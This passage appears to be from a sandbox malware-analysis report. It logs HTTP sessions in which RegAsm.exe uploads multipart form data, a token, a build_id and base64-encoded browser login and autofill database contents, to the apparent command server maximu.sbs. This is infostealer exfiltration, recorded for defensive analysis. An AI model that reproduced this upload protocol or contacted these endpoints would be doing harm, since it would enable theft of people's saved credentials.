                                                                                                                                                                                                                                                          Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:26 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:27 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:27 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          14192.168.2.449769116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:27 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----jeua1nyuas0zu3e3ectj
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 142457
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:27 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 6a 65 75 61 31 6e 79 75 61 73 30 7a 75 33 65 33 65 63 74 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 6a 65 75 61 31 6e 79 75 61 73 30 7a 75 33 65 33 65 63 74 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 6a 65 75 61 31 6e 79 75 61 73 30 7a 75 33 65 33 65 63 74 6a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------jeua1nyuas0zu3e3ectjContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------jeua1nyuas0zu3e3ectjContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------jeua1nyuas0zu3e3ectjCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:27 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                          Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                          2025-01-13 19:18:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:27 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:27 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:28 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:28 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          15192.168.2.449770116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:28 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----jeua1nyuas0zu3e3ectj
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 493
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:28 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 6a 65 75 61 31 6e 79 75 61 73 30 7a 75 33 65 33 65 63 74 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 6a 65 75 61 31 6e 79 75 61 73 30 7a 75 33 65 33 65 63 74 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 6a 65 75 61 31 6e 79 75 61 73 30 7a 75 33 65 33 65 63 74 6a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------jeua1nyuas0zu3e3ectjContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------jeua1nyuas0zu3e3ectjContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------jeua1nyuas0zu3e3ectjCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Mon, 13 Jan 2025 19:18:29 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2025-01-13 19:18:29 UTC14INData Raw: 34 0d 0a 6f 6b 20 36 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4ok 60


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          16192.168.2.449771116.203.166.1244437412C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-13 19:18:29 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----w47qq9rqqimozu3e3ekx
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                          Host: maximu.sbs
                                                                                                                                                                                                                                                          Content-Length: 66001
                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          2025-01-13 19:18:29 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 77 34 37 71 71 39 72 71 71 69 6d 6f 7a 75 33 65 33 65 6b 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 39 34 37 30 30 39 38 36 64 31 30 65 32 37 63 36 36 39 61 38 32 33 64 30 64 34 63 33 66 35 0d 0a 2d 2d 2d 2d 2d 2d 77 34 37 71 71 39 72 71 71 69 6d 6f 7a 75 33 65 33 65 6b 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 36 35 30 34 61 37 61 64 37 61 62 63 31 32 38 32 31 37 66 35 34 63 35 61 61 33 63 33 66 61 39 0d 0a 2d 2d 2d 2d 2d 2d 77 34 37 71 71 39 72 71 71 69 6d 6f 7a 75 33 65 33 65 6b 78 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                          Data Ascii: ------w47qq9rqqimozu3e3ekxContent-Disposition: form-data; name="token"ef94700986d10e27c669a823d0d4c3f5------w47qq9rqqimozu3e3ekxContent-Disposition: form-data; name="build_id"16504a7ad7abc128217f54c5aa3c3fa9------w47qq9rqqimozu3e3ekxCont
                                                                                                                                                                                                                                                          2025-01-13 19:18:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                          2025-01-13 19:18:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
